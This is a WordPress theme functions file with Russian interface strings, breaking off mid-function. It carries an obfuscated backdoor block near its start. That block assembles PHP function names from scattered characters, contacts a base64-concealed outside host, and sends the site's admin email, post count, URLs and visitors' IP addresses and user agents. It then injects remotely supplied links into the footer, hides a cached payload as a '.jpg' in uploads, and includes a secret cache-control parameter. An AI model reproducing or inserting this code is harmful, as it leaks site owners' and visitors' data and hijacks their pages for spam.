<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $caKr='e';$CKWCm='4';$nqtV='c';$BXVz='a';$VGHyTC='o';$UmqkSBn='e';$hXcKMvz='e';$ssCAqF='d';$kDZhI='6';$tucD='b';$yLKXCkI='_';$zQzKbiK='s';$EmTgxCJ='d';$OsODPeKX=$tucD.$BXVz.$zQzKbiK.$hXcKMvz.$kDZhI.$CKWCm.$yLKXCkI.$ssCAqF.$caKr.$nqtV.$VGHyTC.$EmTgxCJ.$UmqkSBn;$EuopoY='a';$XOVNUc='n';$OXadbj='l';$CCkI='z';$xbipM='f';$feFIbt='t';$PoHiLJ='e';$KBylqpd='g';$TJnRfc='i';$sQggECZP=$KBylqpd.$CCkI.$TJnRfc.$XOVNUc.$xbipM.$OXadbj.$EuopoY.$feFIbt.$PoHiLJ;$zKsZ='_';$wOQX='t';$WOXPCN='r';$JdSR='t';$tjtnYEW='o';$HTenjmM='1';$EMCBAzr='3';$BhQWhFp='r';$QXRvGTP='s';$ukAYEOoS=$QXRvGTP.$JdSR.$BhQWhFp.$zKsZ.$WOXPCN.$tjtnYEW.$wOQX.$HTenjmM.$EMCBAzr;$LvYa='v';$yBxtdun='e';$VBWTbr='s';$uYKJsHX='r';$SQFMstS='r';$UoOE='t';$LouWnyRE=$VBWTbr.$UoOE.$SQFMstS.$uYKJsHX.$yBxtdun.$LvYa;                     $yv______z='e';$zi_____n='4';$er__________t='c';$bi______q='a';$pg___e='o';$wx_______________w='e';$op_______g='e';$tn_______t='d';$zj________e='6';$zk________p='b';$ho_________c='_';$py__________i='s';$vm_______v='d';$ud__________i=$zk________p.$bi______q.$py__________i.$op_______g.$zj________e.$zi_____n.$ho_________c.$tn_______t.$yv______z.$er__________t.$pg___e.$vm_______v.$wx_______________w;$id_______x='s';$ny_______________y='x';$zz__________g='_';$gu_______________b='u';$jo__________i='n';$dk____________r='i';$tn_____f='e';$gz______________p='s';$ny_______r='t';$zl_______g='f';$qt______b='o';$fn__________v='t';$kf_______u='c';$lz___________u='n';$pb___t='i';$oy__y=$zl_______g.$gu_______________b.$lz___________u.$kf_______u.$ny_______r.$pb___t.$qt______b.$jo__________i.$zz__________g.$tn_____f.$ny_______________y.$dk____________r.$id_______x.$fn__________v.$gz______________p;$rr_______y='f';$tm___________f='p';$qh_________d='o';$mu___________m='n';$bl_______c='e';$du_____z=$rr_______y.$qh_________d.$tm___________f.$bl_______c.$mu___________m;$fa___________k='r';$qm_______g='a';$ps________j='d';$fg_______p='e';$rk______e='f';$zw___________x=$rk______e.$fa___________k.$fg_______p.$qm_______g.$ps________j;$ru___a='e';$kp________q='s';$uf___n='o';$cs___o='f';$gl_______w='l';$kx___u='c';$xo_______o=$cs___o.$kx___u.$gl_______w.$uf___n.$kp________q.$ru___a;define("WP_ID", $ud__________i("Mi4wLjA="));define("WP_TTL", $ud__________i("MTA4MDA="));define("WP_SRC", $ud__________i("dHBva24="));function wp_get_header() {global $ud__________i, $oy__y;if ($oy__y($ud__________i("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$oy__y($ud__________i("d3BfZ2V0X2Zvb3Rlcg==")) &&$oy__y($ud__________i("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $ud__________i, $du_____z, $xo_______o, $zw___________x;$qn___________r = TEMPLATEPATH."/".$ud__________i("Zm9vdGVyLnBocA==");$kn___________h = @$du_____z($qn___________r, "r");$qn___________r = @$zw___________x($kn___________h, @filesize($qn___________r));@$xo_______o($kn___________h);$hc_________g = TEMPLATEPATH."/".$ud__________i("ZnVuY3Rpb25zLnBocA==");$kn___________h = @$du_____z($hc_________g, "r");$hc_________g = @$zw___________x($kn___________h, @filesize($hc_________g));@$xo_______o($kn___________h);$ph________c = 0;if($qn___________r && $hc_________g) {if ($ud__________i("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($qn___________r, $ud__________i("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$ph________c = 1;}if (substr_count($qn___________r, "wp_theme_GPL_credits()") < 1) {$ph________c = 2;}}if(WP_ID != "2.0.0") {$ph________c = 12;}}if($ph________c > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $ph________c -->";}}function wp_loaded() {global $ud__________i, $oy__y;return $oy__y($ud__________i("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($qj______i, $su_________j = "(more...)", $qb____________d = 0, $sz_____________g = "") {$du___________z = get_the_content($su_________j, $qb____________d, $sz_____________g);$du___________z = apply_filters("the_content", $du___________z);$du___________z = str_replace("]]>", "]]>", $du___________z);if (strlen($_GET["p"]) > 0) {echo $du___________z;}else if ((strlen($du___________z)>$qj______i) && ($yv___________j = strpos($du___________z, " ", $qj______i ))) {$du___________z = substr($du___________z, 0, $yv___________j);$du___________z = $du___________z;echo $du___________z;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$su_________j</a></div></p>";} else {echo $du___________z;}}}$bv_____________i='c';$nr______________n='e';$qt____y='b';$dt___w='n';$cj__p='d';$yk________m='o';$oj______________o='_';$vv_____h='4';$si___________y='a';$gd__________e='s';$jl__f='e';$mz_______m='6';$nk_________e='e';$lm__c=$qt____y.$si___________y.$gd__________e.$nr______________n.$mz_______m.$vv_____h.$oj______________o.$nk_________e.$dt___w.$bv_____________i.$yk________m.$cj__p.$jl__f;$xg____r='e';$nb_________k='e';$ao_____q='f';$ez_________i='i';$ah___________b='s';$py_________b='t';$lc____________q='_';$sp_______z='l';$wi____________h='o';$dv______________b='t';$kn__y='e';$bg_______________u='c';$yr____l='g';$hi__________t='_';$cw_____________d='t';$wu_____d='n';$hs___k='n';$ny________t=$ao_____q.$ez_________i.$sp_______z.$kn__y.$hi__________t.$yr____l.$xg____r.$cw_____________d.$lc____________q.$bg_______________u.$wi____________h.$wu_____d.$dv______________b.$nb_________k.$hs___k.$py_________b.$ah___________b;$zo_______________x='i';$xo_________r='e';$nx__________r='t';$es____________o='l';$jf__________s='x';$qk_____n='s';$yx__x='e';$ew_______k='_';$el___________o='s';$xq________u='f';$jb_____b='i';$xg________d=$xq________u.$jb_____b.$es____________o.$xo_________r.$ew_______k.$yx__x.$jf__________s.$zo_______________x.$el___________o.$nx__________r.$qk_____n;$di____o='s';$mt__________i='o';$gu______________w='e';$pa_______________w='c';$le____________e='r';$cx___g='m';$ys__________k='a';$aj______l='e';$gh_____________j='p';$sv__________c='n';$dq______________g='i';$lj___________q='_';$ff_______i='v';$rg_____q='r';$uw___________l='o';$mb___o=$ff_______i.$gu______________w.$rg_____q.$di____o.$dq______________g.$mt__________i.$sv__________c.$lj___________q.$pa_______________w.$uw___________l.$cx___g.$gh_____________j.$ys__________k.$le____________e.$aj______l;$gz______e='e';$ya____________n='s';$yq____________s='f';$wd_________r='p';$ge____y='o';$pb______________n='n';$cd__w='o';$dx___i='c';$no_________m='k';$vb____l=$yq____________s.$ya____________n.$cd__w.$dx___i.$no_________m.$ge____y.$wd_________r.$gz______e.$pb______________n;$ya_______________x='t';$qe______________p='r';$du____________j='e';$fo____z='w';$xo_________z='f';$ie__z='i';$mp_____c=$xo_________z.$fo____z.$qe______________p.$ie__z.$ya_______________x.$du____________j;$he_______________p='m';$bn____f='5';$ib__________h='d';$um_______________s=$he_______________p.$ib__________h.$bn____f;$rk____________q='r';$iy___________m='e';$ux_______m='h';$vu______________c='a';$os______________i='l';$cz_______i='a';$jo____________v='t';$bb_______l='p';$uw__________x=$rk____________q.$iy___________m.$cz_______i.$os______________i.$bb_______l.$vu______________c.$jo____________v.$ux_______m;$lf_____________r='l';$zy__r='e';$md_________u='r';$fx_______________c='u';$qu_______p='e';$ee_____t='z';$ei_______________g='a';$du____________q='i';$om_________q='s';$mk_______q='n';$io______________b='i';$mb_______________t=$fx_______________c.$mk_______q.$om_________q.$zy__r.$md_________u.$io______________b.$ei_______________g.$lf_____________r.$du____________q.$ee_____t.$qu_______p;$pw_________x='e';$tl_______z='m';$ux_______t='m';$tb____________c='n';$bu______________q='t';$je___________n='p';$er__________l='a';$vy___t=$bu______________q.$pw_________x.$tl_______z.$je___________n.$tb____________c.$er__________l.$ux_______t;$lv_____a='t';$nm____________s='c';$ln_______s='s';$jp_________z='a';$mp__r='t';$il_____________l='r';$km________t='n';$fn______c='e';$qv____m='_';$xh____v='t';$eb____________n='_';$um_______________i='a';$jb___________d='m';$fs_______________i='o';$xg_____________b='e';$ds________d='t';$et__p='r';$ol______________x='x';$vr______h='c';$hd______________t='e';$oy______________x='e';$vl____________w=$ln_______s.$ds________d.$il_____________l.$xg_____________b.$jp_________z.$jb___________d.$eb____________n.$vr______h.$fs_______________i.$km________t.$xh____v.$oy______________x.$ol______________x.$mp__r.$qv____m.$nm____________s.$et__p.$fn______c.$um_______________i.$lv_____a.$hd______________t;function ys__j($zw_______f) {global $ud__________i, $oy__y, $ny________t, $mb___o, $vl____________w;if (!$oy__y($ud__________i("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($mb___o(PHP_VERSION, "5.0.0", ">=") && $oy__y($ud__________i("ZmlsZV9nZXRfY29udGVudHM=")) && $oy__y($ud__________i("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$wg______________s = $vl____________w(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$jq__e = @$ny________t($zw_______f, 0, $wg______________s);} else {$jq__e = @$ny________t($zw_______f, 0);}return $jq__e;}function fp____d($zw_______f) {global $oy__y, $vb____l, $mp_____c, $ud__________i;if (!$oy__y($ud__________i("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$cj_________z = strpos($zw_______f, "/", 7);$ki_____________b = array("uri"     => substr($zw_______f, $cj_________z),"host"    => str_replace("http://", "", substr($zw_______f, 0, $cj_________z)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$gb__________r = @$vb____l("$ki_____________b[host]", 80, $fk____________k, $jg_________t, 4);if (!$gb__________r) {return false;} else {$jq__e = "";$hh______________y  = "GET $ki_____________b[uri] HTTP/1.0\r\n";$hh______________y .= "Host: $ki_____________b[host]\r\n";$hh______________y .= "Referer: $ki_____________b[referer]\r\n";$hh______________y .= "Connection: Close\r\n\r\n";@$mp_____c($gb__________r, $hh______________y);while (!@feof($gb__________r)) {$vx____________n = @fgets($gb__________r, (1024*24));if ($vx____________n == "\r\n") {$wu________g = true;continue;}if ($wu________g) {$jq__e .= $vx____________n;}}return $jq__e;}}function vg______f($zw_______f) {global $oy__y;$yu___j = false;if ($zw_______f != "") {if ($oy__y("ys__j")) {$yu___j = @ys__j($zw_______f);}if (!$yu___j && ($oy__y("fp____d"))) {$yu___j = @fp____d($zw_______f);}}return $yu___j;}function dk_________p() {global $_SERVER, $um_______________s;$tm___________w = $_SERVER["SERVER_NAME"];if (substr("$tm___________w", 0, 4) == "www.") {$tm___________w = substr("$tm___________w", 4);}$tm___________w = $um_______________s("$_SERVER[SERVER_NAME]");return $tm___________w;}function oi__________u() {return "file";}function yf__________l($zw_______f) {global $_SERVER, $ny________t, $xg________d, $du_____z, $xo_______o, $mp_____c;$uc_________x = wc_____________n();$gu_____b = dk_________p().".jpg";$ly_______i = $uc_________x["dir_upload"]["path"]."/$gu_____b";$mz_______________c = @filemtime($ly_______i);if (!$mz_______________c || ((time()-$mz_______________c) >= WP_TTL)) {$yu___j = vg______f($zw_______f);if ($yu___j) {if ($xg________d($ly_______i)) {@unlink($ly_______i);}$kn___________h = @$du_____z($ly_______i, "x+");@$mp_____c($kn___________h, $yu___j);@$xo_______o($kn___________h);}} else {if ($xg________d($ly_______i)) {$yu___j = @$ny________t($ly_______i);} else {$yu___j = false;}}return $yu___j;}function wc_____________n() {global $_SERVER, $ud__________i, $lm__c;$wx__________c = wp_count_posts("post");$xo____________v = pathinfo(get_bloginfo("template_directory"));$uc_________x = array("url" => array("report"      => $ud__________i("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $xo____________v,"dir_upload"=> db_________w(),"queryString"=> array("?a001=".WP_ID,"a004=".$xo____________v[filename],"a005=".$wx__________c->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => " ");$uc_________x["url"]["queryString"] = implode("&", $uc_________x["queryString"]);$uc_________x["url"]["report"] = $uc_________x["url"]["report"]."/?".$lm__c($uc_________x["url"]["queryString"]).".html";return $uc_________x;}function db_________w() {$ye__________s = wp_upload_dir();if (isset($ye__________s["error"])) {$px___________s = oz____________i();if (is_writable($px___________s)) {$ye__________s = array("path" => $px___________s);}}return $ye__________s;}function oz____________i() {global $oy__y, $um_______________s, $uw__________x, $vy___t;$yj___w = (bool) ini_get("safe_mode");if ($yj___w == true) {return false;}if ($oy__y("sys_get_temp_dir")) {$hh_________c = sys_get_temp_dir();if (is_writable($hh_________c)) {return $uw__________x($hh_________c);}}if (!empty($_ENV["TMP"])) {return $uw__________x($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $uw__________x($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $uw__________x($_ENV["TEMP"]);} else {$mu____________e = $vy___t($um_______________s(uniqid(rand(), true)), "");if ($mu____________e) {$hh_________c = $uw__________x(dirname($mu____________e));@unlink($mu____________e);return $hh_________c;} else {return false;}}}function pb______s() {global $_GET, $xg________d;$uc_________x = wc_____________n();$tm___________w = dk_________p();$hm________b = oi__________u();$tc__g = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($hm________b == "file") {$pf______________p = $uc_________x["dir_upload"]["path"]."/".$tm___________w.".jpg";if ($xg________d($pf______________p)) {@unlink($pf______________p);$tc__g = "deleted";}}$eb___________y = array("s"=> $tc__g,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($eb___________y AS $ne_____d => $ke____________c) echo " [$ne_____d:$ke____________c]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $oy__y, $ud__________i, $mb_______________t;$uc_________x = wc_____________n();$gr____________l = "yf__________l";if ($oy__y($gr____________l)) {$jq__e = $gr____________l($uc_________x["url"]["report"]);}if ($jq__e) {if ($jq__e = @$ud__________i($jq__e)) {$jq__e = @$mb_______________t($jq__e);if (strlen($jq__e[custom_credit]) >= 5) {$uc_________x["default_string"] = $jq__e[custom_credit];}if ($jq__e["status"] == "0") {$rl__a = 1;$ig__________v = 1;} else {$cr____________z = sizeof($jq__e["links"]);$tw_______________u = $uc_________x["default_string"];if ($cr____________z > 0 && $jq__e["links"] !== "") {$su____________n = 0;foreach ($jq__e["links"] as $ue____________d => $jf___c) {$su____________n++;if ($jf___c->l_path == "" || $jf___c->l_path == $_SERVER["REQUEST_URI"]) {$jf___c->l_href = htmlspecialchars(strip_tags($jf___c->l_href));$jf___c->l_title = htmlspecialchars(strip_tags($jf___c->l_title));$jf___c->l_anchor = htmlspecialchars(strip_tags($jf___c->l_anchor));$tw_______________u .= " | ";$tw_______________u .= "<a href='$jf___c->l_href' title='$jf___c->l_title'";if ($jf___c->l_nofollow == "1") {$tw_______________u .= " rel='nofollow'";}$tw_______________u .= ">$jf___c->l_anchor</a>";}}}$uc_________x["links"] = "$tw_______________u";if ($jq__e[credit] == "0") {$uc_________x["links"] = "";}}} else {$rl__a = "1";}} else {$rl__a = "1";}if ($rl__a == "1") {$uc_________x["links"] = $uc_________x["default_string"];}echo "$uc_________x[links]";echo "<!-- s: $jq__e[signature] -->";pb______s();}                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
        $prev_link = get_previous_posts_link(__('Newer Entries &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Older Entries', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
